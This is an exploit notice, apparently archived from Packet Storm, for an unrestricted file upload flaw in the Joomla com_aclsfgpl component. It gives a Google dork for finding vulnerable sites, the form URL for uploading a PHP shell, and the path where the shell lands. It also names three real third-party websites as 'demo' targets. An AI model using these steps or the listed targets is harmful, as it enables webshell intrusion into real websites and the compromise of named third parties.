The Joomla Aclsfgpl component suffers from a remote shell upload vulnerability.
ffdc2dca430359bb550c7f9e7de6df509bff1d997c0bf10e1f18cee2fa5e16f0[+] Author: TUNISIAN CYBER
[+] Exploit Title: Joomla Component com_aclsfgpl File Upload Vulnerability
[+] Date: 07-01-2014
[+] Category: WebApp
[+] Google Dork: :inurl:"index.php?option=com_aclsfgpl" add_form
[+] Tested on: KaliLinux
[+} Friend's blog: www.na3il.com
########################################################################################
+Exploit:
You can upload file (.php/.php.jpg...)
+P.O.C:
127.0.0.1/index.php?option=com_aclsfgpl&Itemid=[num]&ct=servs1&md=add_form
Shell path:
copy shell pic link or 127.0.0.1/components/com_aclsfgpl/photos/
Demo:
http://www.club-plongee.com/index.php?option=com_aclsfgpl&Itemid=155&ct=womenm&md=add_form
http://www.triclubsandiego.org/index.php?option=com_aclsfgpl&Itemid=269&ct=tcsd1&md=add_form
http://aero.decines.free.fr/modelisme/index.php?option=com_aclsfgpl&Itemid=90&ct=pet5&md=add_form
./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed